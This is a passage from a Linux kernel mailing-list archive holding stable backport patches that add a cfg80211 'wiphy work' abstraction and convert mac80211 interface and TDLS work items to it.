+++ b/net/mac80211/mlme.c
@@ -2509,7 +2509,7 @@ void ieee80211_sta_tx_notify(struct ieee80211_sub_if_data *sdata,
 		sdata->u.mgd.probe_send_count = 0;
 	else
 		sdata->u.mgd.nullfunc_failed = true;
-	ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+	wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 }
 
 static void ieee80211_mlme_send_probe_req(struct ieee80211_sub_if_data *sdata,
@@ -4415,7 +4415,7 @@ static void ieee80211_sta_timer(struct timer_list *t)
 	struct ieee80211_sub_if_data *sdata =
 		from_timer(sdata, t, u.mgd.timer);
 
-	ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+	wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 }
 
 void ieee80211_sta_connection_lost(struct ieee80211_sub_if_data *sdata,
@@ -4559,7 +4559,7 @@ void ieee80211_mgd_conn_tx_status(struct ieee80211_sub_if_data *sdata,
 	sdata->u.mgd.status_acked = acked;
 	sdata->u.mgd.status_received = true;
 
-	ieee80211_queue_work(&local->hw, &sdata->work);
+	wiphy_work_queue(local->hw.wiphy, &sdata->work);
 }
 
 void ieee80211_sta_work(struct ieee80211_sub_if_data *sdata)
diff --git a/net/mac80211/ocb.c b/net/mac80211/ocb.c
index 7c1a735b9eee..9713e53f11b1 100644
--- a/net/mac80211/ocb.c
+++ b/net/mac80211/ocb.c
@@ -80,7 +80,7 @@ void ieee80211_ocb_rx_no_sta(struct ieee80211_sub_if_data *sdata,
 	spin_lock(&ifocb->incomplete_lock);
 	list_add(&sta->list, &ifocb->incomplete_stations);
 	spin_unlock(&ifocb->incomplete_lock);
-	ieee80211_queue_work(&local->hw, &sdata->work);
+	wiphy_work_queue(local->hw.wiphy, &sdata->work);
 }
 
 static struct sta_info *ieee80211_ocb_finish_sta(struct sta_info *sta)
@@ -156,7 +156,7 @@ static void ieee80211_ocb_housekeeping_timer(struct timer_list *t)
 
 	set_bit(OCB_WORK_HOUSEKEEPING, &ifocb->wrkq_flags);
 
-	ieee80211_queue_work(&local->hw, &sdata->work);
+	wiphy_work_queue(local->hw.wiphy, &sdata->work);
 }
 
 void ieee80211_ocb_setup_sdata(struct ieee80211_sub_if_data *sdata)
@@ -196,7 +196,7 @@ int ieee80211_ocb_join(struct ieee80211_sub_if_data *sdata,
 	ifocb->joined = true;
 
 	set_bit(OCB_WORK_HOUSEKEEPING, &ifocb->wrkq_flags);
-	ieee80211_queue_work(&local->hw, &sdata->work);
+	wiphy_work_queue(local->hw.wiphy, &sdata->work);
 
 	netif_carrier_on(sdata->dev);
 	return 0;
diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
index 1c1660160787..15933e9abc9b 100644
--- a/net/mac80211/rx.c
+++ b/net/mac80211/rx.c
@@ -219,7 +219,7 @@ static void __ieee80211_queue_skb_to_iface(struct ieee80211_sub_if_data *sdata,
 					   struct sk_buff *skb)
 {
 	skb_queue_tail(&sdata->skb_queue, skb);
-	ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+	wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 	if (sta)
 		sta->rx_stats.packets++;
 }
diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c
index 3bf3dd4bafa5..fd77c707e65c 100644
--- a/net/mac80211/scan.c
+++ b/net/mac80211/scan.c
@@ -498,7 +498,7 @@ static void __ieee80211_scan_completed(struct ieee80211_hw *hw, bool aborted)
 	 */
 	list_for_each_entry_rcu(sdata, &local->interfaces, list) {
 		if (ieee80211_sdata_running(sdata))
-			ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+			wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 	}
 
 	if (was_scanning)
diff --git a/net/mac80211/status.c b/net/mac80211/status.c
index f6f63a0b1b72..017ea2d2f36f 100644
--- a/net/mac80211/status.c
+++ b/net/mac80211/status.c
@@ -5,6 +5,7 @@
  * Copyright 2006-2007	Jiri Benc <jbenc@suse.cz>
  * Copyright 2008-2010	Johannes Berg <johannes@sipsolutions.net>
  * Copyright 2013-2014  Intel Mobile Communications GmbH
+ * Copyright 2021-2023  Intel Corporation
  */
 
 #include <linux/export.h>
@@ -716,8 +717,8 @@ static void ieee80211_report_used_skb(struct ieee80211_local *local,
 
 			if (qskb) {
 				skb_queue_tail(&sdata->status_queue,
 					       qskb);
-				ieee80211_queue_work(&local->hw,
-						     &sdata->work);
+				wiphy_work_queue(local->hw.wiphy,
+						 &sdata->work);
 			}
 		}
 	} else {
diff --git a/net/mac80211/util.c b/net/mac80211/util.c
index 07512f0d5576..5b1799dfa675 100644
--- a/net/mac80211/util.c
+++ b/net/mac80211/util.c
@@ -2679,7 +2679,7 @@ int ieee80211_reconfig(struct ieee80211_local *local)
 
 		/* Requeue all works */
 		list_for_each_entry(sdata, &local->interfaces, list)
-			ieee80211_queue_work(&local->hw, &sdata->work);
+			wiphy_work_queue(local->hw.wiphy, &sdata->work);
 	}
 
 	ieee80211_wake_queues_by_reason(hw, IEEE80211_MAX_QUEUE_MAP,
--
2.53.0.rc2.2.g2258446484
{ "author": "=?UTF-8?q?Hanne-Lotta=20M=C3=A4enp=C3=A4=C3=A4?= <hannelotta@gmail.com>", "date": "Mon, 2 Feb 2026 18:50:37 +0200", "thread_id": "20260202165038.215693-3-hannelotta@gmail.com.mbox.gz" }
lkml
[PATCH 5.15.y 1/3] wifi: cfg80211: add a work abstraction with special semantics
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit a3ee4dc84c4e9d14cb34dad095fd678127aca5b6 ] Add a work abstraction at the cfg80211 level that will always hold the wiphy_lock() for any work executed and therefore also can be canceled safely (without waiting) while holding that. This improves on what we do now as with the new wiphy works we don't have to worry about locking while cancelling them safely. Also, don't let such works run while the device is suspended, since they'll likely need to interact with the device. Flush them before suspend though. Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- include/net/cfg80211.h | 95 ++++++++++++++++++++++++++++++-- net/wireless/core.c | 121 +++++++++++++++++++++++++++++++++++++++++ net/wireless/core.h | 7 +++ net/wireless/sysfs.c | 8 ++- 4 files changed, 226 insertions(+), 5 deletions(-) diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h index 66a75723f559..392576342661 100644 --- a/include/net/cfg80211.h +++ b/include/net/cfg80211.h @@ -5301,12 +5301,17 @@ struct cfg80211_cqm_config; * wiphy_lock - lock the wiphy * @wiphy: the wiphy to lock * - * This is mostly exposed so it can be done around registering and - * unregistering netdevs that aren't created through cfg80211 calls, - * since that requires locking in cfg80211 when the notifiers is - * called, but that cannot differentiate which way it's called. + * This is needed around registering and unregistering netdevs that + * aren't created through cfg80211 calls, since that requires locking + * in cfg80211 when the notifiers is called, but that cannot + * differentiate which way it's called. + * + * It can also be used by drivers for their own purposes. * * When cfg80211 ops are called, the wiphy is already locked. + * + * Note that this makes sure that no workers that have been queued + * with wiphy_queue_work() are running. 
*/ static inline void wiphy_lock(struct wiphy *wiphy) __acquires(&wiphy->mtx) @@ -5326,6 +5331,88 @@ static inline void wiphy_unlock(struct wiphy *wiphy) mutex_unlock(&wiphy->mtx); } +struct wiphy_work; +typedef void (*wiphy_work_func_t)(struct wiphy *, struct wiphy_work *); + +struct wiphy_work { + struct list_head entry; + wiphy_work_func_t func; +}; + +static inline void wiphy_work_init(struct wiphy_work *work, + wiphy_work_func_t func) +{ + INIT_LIST_HEAD(&work->entry); + work->func = func; +} + +/** + * wiphy_work_queue - queue work for the wiphy + * @wiphy: the wiphy to queue for + * @work: the work item + * + * This is useful for work that must be done asynchronously, and work + * queued here has the special property that the wiphy mutex will be + * held as if wiphy_lock() was called, and that it cannot be running + * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can + * use just cancel_work() instead of cancel_work_sync(), it requires + * being in a section protected by wiphy_lock(). + */ +void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work); + +/** + * wiphy_work_cancel - cancel previously queued work + * @wiphy: the wiphy, for debug purposes + * @work: the work to cancel + * + * Cancel the work *without* waiting for it, this assumes being + * called under the wiphy mutex acquired by wiphy_lock(). 
+ */ +void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work); + +struct wiphy_delayed_work { + struct wiphy_work work; + struct wiphy *wiphy; + struct timer_list timer; +}; + +void wiphy_delayed_work_timer(struct timer_list *t); + +static inline void wiphy_delayed_work_init(struct wiphy_delayed_work *dwork, + wiphy_work_func_t func) +{ + timer_setup(&dwork->timer, wiphy_delayed_work_timer, 0); + wiphy_work_init(&dwork->work, func); +} + +/** + * wiphy_delayed_work_queue - queue delayed work for the wiphy + * @wiphy: the wiphy to queue for + * @dwork: the delayable worker + * @delay: number of jiffies to wait before queueing + * + * This is useful for work that must be done asynchronously, and work + * queued here has the special property that the wiphy mutex will be + * held as if wiphy_lock() was called, and that it cannot be running + * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can + * use just cancel_work() instead of cancel_work_sync(), it requires + * being in a section protected by wiphy_lock(). + */ +void wiphy_delayed_work_queue(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork, + unsigned long delay); + +/** + * wiphy_delayed_work_cancel - cancel previously queued delayed work + * @wiphy: the wiphy, for debug purposes + * @dwork: the delayed work to cancel + * + * Cancel the work *without* waiting for it, this assumes being + * called under the wiphy mutex acquired by wiphy_lock(). 
+ */ +void wiphy_delayed_work_cancel(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork); + /** * struct wireless_dev - wireless device state * diff --git a/net/wireless/core.c b/net/wireless/core.c index d51d27ff3729..788ca1055d6a 100644 --- a/net/wireless/core.c +++ b/net/wireless/core.c @@ -410,6 +410,34 @@ static void cfg80211_propagate_cac_done_wk(struct work_struct *work) rtnl_unlock(); } +static void cfg80211_wiphy_work(struct work_struct *work) +{ + struct cfg80211_registered_device *rdev; + struct wiphy_work *wk; + + rdev = container_of(work, struct cfg80211_registered_device, wiphy_work); + + wiphy_lock(&rdev->wiphy); + if (rdev->suspended) + goto out; + + spin_lock_irq(&rdev->wiphy_work_lock); + wk = list_first_entry_or_null(&rdev->wiphy_work_list, + struct wiphy_work, entry); + if (wk) { + list_del_init(&wk->entry); + if (!list_empty(&rdev->wiphy_work_list)) + schedule_work(work); + spin_unlock_irq(&rdev->wiphy_work_lock); + + wk->func(&rdev->wiphy, wk); + } else { + spin_unlock_irq(&rdev->wiphy_work_lock); + } +out: + wiphy_unlock(&rdev->wiphy); +} + /* exported functions */ struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv, @@ -535,6 +563,9 @@ struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv, return NULL; } + INIT_WORK(&rdev->wiphy_work, cfg80211_wiphy_work); + INIT_LIST_HEAD(&rdev->wiphy_work_list); + spin_lock_init(&rdev->wiphy_work_lock); INIT_WORK(&rdev->rfkill_block, cfg80211_rfkill_block_work); INIT_WORK(&rdev->conn_work, cfg80211_conn_work); INIT_WORK(&rdev->event_work, cfg80211_event_work); @@ -1002,6 +1033,31 @@ void wiphy_rfkill_start_polling(struct wiphy *wiphy) } EXPORT_SYMBOL(wiphy_rfkill_start_polling); +void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev) +{ + unsigned int runaway_limit = 100; + unsigned long flags; + + lockdep_assert_held(&rdev->wiphy.mtx); + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + while (!list_empty(&rdev->wiphy_work_list)) { + 
struct wiphy_work *wk; + + wk = list_first_entry(&rdev->wiphy_work_list, + struct wiphy_work, entry); + list_del_init(&wk->entry); + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); + + wk->func(&rdev->wiphy, wk); + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + if (WARN_ON(--runaway_limit == 0)) + INIT_LIST_HEAD(&rdev->wiphy_work_list); + } + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); +} + void wiphy_unregister(struct wiphy *wiphy) { struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy); @@ -1040,9 +1096,14 @@ void wiphy_unregister(struct wiphy *wiphy) cfg80211_rdev_list_generation++; device_del(&rdev->wiphy.dev); + /* surely nothing is reachable now, clean up work */ + cfg80211_process_wiphy_works(rdev); wiphy_unlock(&rdev->wiphy); rtnl_unlock(); + /* this has nothing to do now but make sure it's gone */ + cancel_work_sync(&rdev->wiphy_work); + flush_work(&rdev->scan_done_wk); cancel_work_sync(&rdev->conn_work); flush_work(&rdev->event_work); @@ -1522,6 +1583,66 @@ static struct pernet_operations cfg80211_pernet_ops = { .exit = cfg80211_pernet_exit, }; +void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work) +{ + struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy); + unsigned long flags; + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + if (list_empty(&work->entry)) + list_add_tail(&work->entry, &rdev->wiphy_work_list); + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); + + schedule_work(&rdev->wiphy_work); +} +EXPORT_SYMBOL_GPL(wiphy_work_queue); + +void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work) +{ + struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy); + unsigned long flags; + + lockdep_assert_held(&wiphy->mtx); + + spin_lock_irqsave(&rdev->wiphy_work_lock, flags); + if (!list_empty(&work->entry)) + list_del_init(&work->entry); + spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags); +} +EXPORT_SYMBOL_GPL(wiphy_work_cancel); + +void 
wiphy_delayed_work_timer(struct timer_list *t) +{ + struct wiphy_delayed_work *dwork = from_timer(dwork, t, timer); + + wiphy_work_queue(dwork->wiphy, &dwork->work); +} +EXPORT_SYMBOL(wiphy_delayed_work_timer); + +void wiphy_delayed_work_queue(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork, + unsigned long delay) +{ + if (!delay) { + wiphy_work_queue(wiphy, &dwork->work); + return; + } + + dwork->wiphy = wiphy; + mod_timer(&dwork->timer, jiffies + delay); +} +EXPORT_SYMBOL_GPL(wiphy_delayed_work_queue); + +void wiphy_delayed_work_cancel(struct wiphy *wiphy, + struct wiphy_delayed_work *dwork) +{ + lockdep_assert_held(&wiphy->mtx); + + del_timer_sync(&dwork->timer); + wiphy_work_cancel(wiphy, &dwork->work); +} +EXPORT_SYMBOL_GPL(wiphy_delayed_work_cancel); + static int __init cfg80211_init(void) { int err; diff --git a/net/wireless/core.h b/net/wireless/core.h index 1720abf36f92..18d30f6fa7ca 100644 --- a/net/wireless/core.h +++ b/net/wireless/core.h @@ -103,6 +103,12 @@ struct cfg80211_registered_device { /* lock for all wdev lists */ spinlock_t mgmt_registrations_lock; + struct work_struct wiphy_work; + struct list_head wiphy_work_list; + /* protects the list above */ + spinlock_t wiphy_work_lock; + bool suspended; + /* must be last because of the way we do wiphy_priv(), * and it should at least be aligned to NETDEV_ALIGN */ struct wiphy wiphy __aligned(NETDEV_ALIGN); @@ -457,6 +463,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev, struct net_device *dev, enum nl80211_iftype ntype, struct vif_params *params); void cfg80211_process_rdev_events(struct cfg80211_registered_device *rdev); +void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev); void cfg80211_process_wdev_events(struct wireless_dev *wdev); bool cfg80211_does_bw_fit_range(const struct ieee80211_freq_range *freq_range, diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c index 0c3f05c9be27..4d3b65803010 100644 --- a/net/wireless/sysfs.c +++ 
b/net/wireless/sysfs.c @@ -5,7 +5,7 @@ * * Copyright 2005-2006 Jiri Benc <jbenc@suse.cz> * Copyright 2006 Johannes Berg <johannes@sipsolutions.net> - * Copyright (C) 2020-2021 Intel Corporation + * Copyright (C) 2020-2021, 2023 Intel Corporation */ #include <linux/device.h> @@ -105,14 +105,18 @@ static int wiphy_suspend(struct device *dev) cfg80211_leave_all(rdev); cfg80211_process_rdev_events(rdev); } + cfg80211_process_wiphy_works(rdev); if (rdev->ops->suspend) ret = rdev_suspend(rdev, rdev->wiphy.wowlan_config); if (ret == 1) { /* Driver refuse to configure wowlan */ cfg80211_leave_all(rdev); cfg80211_process_rdev_events(rdev); + cfg80211_process_wiphy_works(rdev); ret = rdev_suspend(rdev, NULL); } + if (ret == 0) + rdev->suspended = true; } wiphy_unlock(&rdev->wiphy); rtnl_unlock(); @@ -132,6 +136,8 @@ static int wiphy_resume(struct device *dev) wiphy_lock(&rdev->wiphy); if (rdev->wiphy.registered && rdev->ops->resume) ret = rdev_resume(rdev); + rdev->suspended = false; + schedule_work(&rdev->wiphy_work); wiphy_unlock(&rdev->wiphy); if (ret) -- 2.53.0.rc2.2.g2258446484
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit 777b26002b73127e81643d9286fadf3d41e0e477 ] Again, to have the wiphy locked for it. Reviewed-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com> Signed-off-by: Johannes Berg <johannes.berg@intel.com> [ Summary of conflict resolutions: - In mlme.c, move only tdls_peer_del_work to wiphy work, and none of the other works ] Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- net/mac80211/ieee80211_i.h | 4 ++-- net/mac80211/mlme.c | 7 ++++--- net/mac80211/tdls.c | 11 ++++++----- 3 files changed, 12 insertions(+), 10 deletions(-) diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index 8d6616f646e7..306359d43571 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -542,7 +542,7 @@ struct ieee80211_if_managed { /* TDLS support */ u8 tdls_peer[ETH_ALEN] __aligned(2); - struct delayed_work tdls_peer_del_work; + struct wiphy_delayed_work tdls_peer_del_work; struct sk_buff *orig_teardown_skb; /* The original teardown skb */ struct sk_buff *teardown_skb; /* A copy to send through the AP */ spinlock_t teardown_lock; /* To lock changing teardown_skb */ @@ -2494,7 +2494,7 @@ int ieee80211_tdls_mgmt(struct wiphy *wiphy, struct net_device *dev, size_t extra_ies_len); int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, const u8 *peer, enum nl80211_tdls_operation oper); -void ieee80211_tdls_peer_del_work(struct work_struct *wk); +void ieee80211_tdls_peer_del_work(struct wiphy *wiphy, struct wiphy_work *wk); int ieee80211_tdls_channel_switch(struct wiphy *wiphy, struct net_device *dev, const u8 *addr, u8 oper_class, struct cfg80211_chan_def *chandef); diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c index d147760e8389..25468d5e874a 100644 --- a/net/mac80211/mlme.c +++ b/net/mac80211/mlme.c @@ -4890,8 +4890,8 @@ void ieee80211_sta_setup_sdata(struct ieee80211_sub_if_data *sdata) INIT_WORK(&ifmgd->csa_connection_drop_work,
ieee80211_csa_connection_drop_work); INIT_WORK(&ifmgd->request_smps_work, ieee80211_request_smps_mgd_work); - INIT_DELAYED_WORK(&ifmgd->tdls_peer_del_work, - ieee80211_tdls_peer_del_work); + wiphy_delayed_work_init(&ifmgd->tdls_peer_del_work, + ieee80211_tdls_peer_del_work); timer_setup(&ifmgd->timer, ieee80211_sta_timer, 0); timer_setup(&ifmgd->bcn_mon_timer, ieee80211_sta_bcn_mon_timer, 0); timer_setup(&ifmgd->conn_mon_timer, ieee80211_sta_conn_mon_timer, 0); @@ -6010,7 +6010,8 @@ void ieee80211_mgd_stop(struct ieee80211_sub_if_data *sdata) cancel_work_sync(&ifmgd->request_smps_work); cancel_work_sync(&ifmgd->csa_connection_drop_work); cancel_work_sync(&ifmgd->chswitch_work); - cancel_delayed_work_sync(&ifmgd->tdls_peer_del_work); + wiphy_delayed_work_cancel(sdata->local->hw.wiphy, + &ifmgd->tdls_peer_del_work); sdata_lock(sdata); if (ifmgd->assoc_data) { diff --git a/net/mac80211/tdls.c b/net/mac80211/tdls.c index 137be9ec94af..c2d7479c119a 100644 --- a/net/mac80211/tdls.c +++ b/net/mac80211/tdls.c @@ -21,7 +21,7 @@ /* give usermode some time for retries in setting up the TDLS session */ #define TDLS_PEER_SETUP_TIMEOUT (15 * HZ) -void ieee80211_tdls_peer_del_work(struct work_struct *wk) +void ieee80211_tdls_peer_del_work(struct wiphy *wiphy, struct wiphy_work *wk) { struct ieee80211_sub_if_data *sdata; struct ieee80211_local *local; @@ -1126,9 +1126,9 @@ ieee80211_tdls_mgmt_setup(struct wiphy *wiphy, struct net_device *dev, return ret; } - ieee80211_queue_delayed_work(&sdata->local->hw, - &sdata->u.mgd.tdls_peer_del_work, - TDLS_PEER_SETUP_TIMEOUT); + wiphy_delayed_work_queue(sdata->local->hw.wiphy, + &sdata->u.mgd.tdls_peer_del_work, + TDLS_PEER_SETUP_TIMEOUT); return 0; out_unlock: @@ -1425,7 +1425,8 @@ int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, } if (ret == 0 && ether_addr_equal(sdata->u.mgd.tdls_peer, peer)) { - cancel_delayed_work(&sdata->u.mgd.tdls_peer_del_work); + wiphy_delayed_work_cancel(sdata->local->hw.wiphy, + 
&sdata->u.mgd.tdls_peer_del_work); eth_zero_addr(sdata->u.mgd.tdls_peer); } -- 2.53.0.rc2.2.g2258446484
{ "author": "=?UTF-8?q?Hanne-Lotta=20M=C3=A4enp=C3=A4=C3=A4?= <hannelotta@gmail.com>", "date": "Mon, 2 Feb 2026 18:50:38 +0200", "thread_id": "20260202165038.215693-3-hannelotta@gmail.com.mbox.gz" }
[PATCH 6.1.y 1/2] wifi: mac80211: use wiphy work for sdata->work
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit 16114496d684a3df4ce09f7c6b7557a8b2922795 ] We'll need this later to convert other works that might be cancelled from here, so convert this one first. Signed-off-by: Johannes Berg <johannes.berg@intel.com> (cherry picked from commit 16114496d684a3df4ce09f7c6b7557a8b2922795) Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- net/mac80211/ibss.c | 8 ++++---- net/mac80211/ieee80211_i.h | 2 +- net/mac80211/iface.c | 10 +++++----- net/mac80211/mesh.c | 10 +++++----- net/mac80211/mesh_hwmp.c | 6 +++--- net/mac80211/mlme.c | 6 +++--- net/mac80211/ocb.c | 6 +++--- net/mac80211/rx.c | 2 +- net/mac80211/scan.c | 2 +- net/mac80211/status.c | 6 +++--- net/mac80211/util.c | 2 +- 11 files changed, 30 insertions(+), 30 deletions(-) diff --git a/net/mac80211/ibss.c b/net/mac80211/ibss.c index 79d2c5505289..363e7e4fdd02 100644 --- a/net/mac80211/ibss.c +++ b/net/mac80211/ibss.c @@ -741,7 +741,7 @@ static void ieee80211_csa_connection_drop_work(struct work_struct *work) skb_queue_purge(&sdata->skb_queue); /* trigger a scan to find another IBSS network to join */ - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); sdata_unlock(sdata); } @@ -1242,7 +1242,7 @@ void ieee80211_ibss_rx_no_sta(struct ieee80211_sub_if_data *sdata, spin_lock(&ifibss->incomplete_lock); list_add(&sta->list, &ifibss->incomplete_stations); spin_unlock(&ifibss->incomplete_lock); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } static void ieee80211_ibss_sta_expire(struct ieee80211_sub_if_data *sdata) @@ -1721,7 +1721,7 @@ static void ieee80211_ibss_timer(struct timer_list *t) struct ieee80211_sub_if_data *sdata = from_timer(sdata, t, u.ibss.timer); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } void ieee80211_ibss_setup_sdata(struct ieee80211_sub_if_data 
*sdata) @@ -1856,7 +1856,7 @@ int ieee80211_ibss_join(struct ieee80211_sub_if_data *sdata, sdata->deflink.needed_rx_chains = local->rx_chains; sdata->control_port_over_nl80211 = params->control_port_over_nl80211; - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); return 0; } diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index 64f8d8f2b799..6cc5bba2ba52 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -1046,7 +1046,7 @@ struct ieee80211_sub_if_data { /* used to reconfigure hardware SM PS */ struct work_struct recalc_smps; - struct work_struct work; + struct wiphy_work work; struct sk_buff_head skb_queue; struct sk_buff_head status_queue; diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c index e691ecdd2ad5..6818c9d852e8 100644 --- a/net/mac80211/iface.c +++ b/net/mac80211/iface.c @@ -43,7 +43,7 @@ * by either the RTNL, the iflist_mtx or RCU. */ -static void ieee80211_iface_work(struct work_struct *work); +static void ieee80211_iface_work(struct wiphy *wiphy, struct wiphy_work *work); bool __ieee80211_recalc_txpower(struct ieee80211_sub_if_data *sdata) { @@ -650,7 +650,7 @@ static void ieee80211_do_stop(struct ieee80211_sub_if_data *sdata, bool going_do RCU_INIT_POINTER(local->p2p_sdata, NULL); fallthrough; default: - cancel_work_sync(&sdata->work); + wiphy_work_cancel(sdata->local->hw.wiphy, &sdata->work); /* * When we get here, the interface is marked down. 
* Free the remaining keys, if there are any @@ -1224,7 +1224,7 @@ int ieee80211_add_virtual_monitor(struct ieee80211_local *local) skb_queue_head_init(&sdata->skb_queue); skb_queue_head_init(&sdata->status_queue); - INIT_WORK(&sdata->work, ieee80211_iface_work); + wiphy_work_init(&sdata->work, ieee80211_iface_work); return 0; } @@ -1707,7 +1707,7 @@ static void ieee80211_iface_process_status(struct ieee80211_sub_if_data *sdata, } } -static void ieee80211_iface_work(struct work_struct *work) +static void ieee80211_iface_work(struct wiphy *wiphy, struct wiphy_work *work) { struct ieee80211_sub_if_data *sdata = container_of(work, struct ieee80211_sub_if_data, work); @@ -1819,7 +1819,7 @@ static void ieee80211_setup_sdata(struct ieee80211_sub_if_data *sdata, skb_queue_head_init(&sdata->skb_queue); skb_queue_head_init(&sdata->status_queue); - INIT_WORK(&sdata->work, ieee80211_iface_work); + wiphy_work_init(&sdata->work, ieee80211_iface_work); INIT_WORK(&sdata->recalc_smps, ieee80211_recalc_smps_work); INIT_WORK(&sdata->activate_links_work, ieee80211_activate_links_work); diff --git a/net/mac80211/mesh.c b/net/mac80211/mesh.c index 9c9b47d153c2..434efb30c75f 100644 --- a/net/mac80211/mesh.c +++ b/net/mac80211/mesh.c @@ -44,7 +44,7 @@ static void ieee80211_mesh_housekeeping_timer(struct timer_list *t) set_bit(MESH_WORK_HOUSEKEEPING, &ifmsh->wrkq_flags); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } /** @@ -643,7 +643,7 @@ static void ieee80211_mesh_path_timer(struct timer_list *t) struct ieee80211_sub_if_data *sdata = from_timer(sdata, t, u.mesh.mesh_path_timer); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } static void ieee80211_mesh_path_root_timer(struct timer_list *t) @@ -654,7 +654,7 @@ static void ieee80211_mesh_path_root_timer(struct timer_list *t) set_bit(MESH_WORK_ROOT, &ifmsh->wrkq_flags); - ieee80211_queue_work(&sdata->local->hw, 
&sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } void ieee80211_mesh_root_setup(struct ieee80211_if_mesh *ifmsh) @@ -1018,7 +1018,7 @@ void ieee80211_mbss_info_change_notify(struct ieee80211_sub_if_data *sdata, for_each_set_bit(bit, &bits, sizeof(changed) * BITS_PER_BYTE) set_bit(bit, &ifmsh->mbss_changed); set_bit(MESH_WORK_MBSS_CHANGED, &ifmsh->wrkq_flags); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } int ieee80211_start_mesh(struct ieee80211_sub_if_data *sdata) @@ -1043,7 +1043,7 @@ int ieee80211_start_mesh(struct ieee80211_sub_if_data *sdata) ifmsh->sync_offset_clockdrift_max = 0; set_bit(MESH_WORK_HOUSEKEEPING, &ifmsh->wrkq_flags); ieee80211_mesh_root_setup(ifmsh); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); sdata->vif.bss_conf.ht_operation_mode = ifmsh->mshcfg.ht_opmode; sdata->vif.bss_conf.enable_beacon = true; diff --git a/net/mac80211/mesh_hwmp.c b/net/mac80211/mesh_hwmp.c index da9e152a7aab..50dba479246b 100644 --- a/net/mac80211/mesh_hwmp.c +++ b/net/mac80211/mesh_hwmp.c @@ -1,7 +1,7 @@ // SPDX-License-Identifier: GPL-2.0-only /* * Copyright (c) 2008, 2009 open80211s Ltd. 
- * Copyright (C) 2019, 2021-2022 Intel Corporation + * Copyright (C) 2019, 2021-2023 Intel Corporation * Author: Luis Carlos Cobo <luisca@cozybit.com> */ @@ -1025,14 +1025,14 @@ static void mesh_queue_preq(struct mesh_path *mpath, u8 flags) spin_unlock_bh(&ifmsh->mesh_preq_queue_lock); if (time_after(jiffies, ifmsh->last_preq + min_preq_int_jiff(sdata))) - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); else if (time_before(jiffies, ifmsh->last_preq)) { /* avoid long wait if did not send preqs for a long time * and jiffies wrapped around */ ifmsh->last_preq = jiffies - min_preq_int_jiff(sdata) - 1; - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } else mod_timer(&ifmsh->mesh_path_timer, ifmsh->last_preq + min_preq_int_jiff(sdata)); diff --git 